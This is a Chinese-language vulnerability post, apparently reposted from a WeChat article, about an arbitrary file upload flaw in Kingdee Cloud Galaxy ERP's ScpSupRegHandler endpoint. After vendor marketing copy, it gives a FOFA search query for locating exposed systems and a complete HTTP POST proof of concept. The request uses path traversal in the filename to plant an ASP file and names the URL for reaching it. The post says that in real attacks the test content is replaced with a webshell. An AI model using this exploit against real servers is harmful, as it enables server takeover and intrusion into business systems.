金蝶云·星空,高成长型企业SaaS市场领导者,市场份额及客户满意度遥遥领先,连续17年稳居IDC中国成长型企业应用软件市场占有率第一,并入选2021年度国家中小企业公共服务示范平台。金蝶云·星空基于领先的可组装低代码PaaS平台,全面服务客户研发、生产、营销、供应链、财务等领域转型,已支持IPD、精益、阿米巴等先进管理理念在3.4万余家客户实践,一起助力企业“产品力、获客力、交付力、口碑力、收益力”全面提升,重构企业数字战斗力。
金蝶云·星空针对机械装备行业业务特性和发展趋势,提供PLM+ERP+MES一体化解决方案,帮助机械行业完善从研发、设计、采购、制造、营销、服务、维护、保养的产品生命周期管理,构筑更好的“五力”,助力企业逐步实现由生产型制造向服务型制造转变。
该系统存在ScpSupRegHandler 文件存在任意文件上传,攻击者可通过此漏洞上传webshell木马,从而控制服务器。
fofa查询
icon_hash="-1629133697" && title=="金蝶云星空"POC
POST /k3cloud/SRM/ScpSupRegHandler HTTP/1.1Host: ip:portUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=fd18dd968b553715cbc5a1982526199bContent-Length: 429--fd18dd968b553715cbc5a1982526199bContent-Disposition: form-data; name="FAtt"; filename="../../../../uploadfiles/check.asp."Content-Type: text/plain<% Response.Write("This website has a vulnerability!!!") %>--fd18dd968b553715cbc5a1982526199bContent-Disposition: form-data; name="FID"2023--fd18dd968b553715cbc5a1982526199bContent-Disposition: form-data; name="dbId_v".--fd18dd968b553715cbc5a1982526199b--
上传成功后,访问:http://ip:port/K3Cloud/uploadfiles/check.asp
实战中将上传内容替换成webshell木马即可
pocsuite漏洞检测
漏洞检测脚本已上传免费漏洞库地址:
https://github.com/Vme18000yuan/FreePOC
希望大家能点个stars支持一下
文章来源: http://mp.weixin.qq.com/s?__biz=MzIxMTg1ODAwNw==&mid=2247498410&idx=2&sn=0755fface397441e4e26091665759292&chksm=974c5d92a03bd484aea0def7e7e40fe11fb6c89177fd5f2e71e8798e7b9df45195ebf1aeb0ae&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh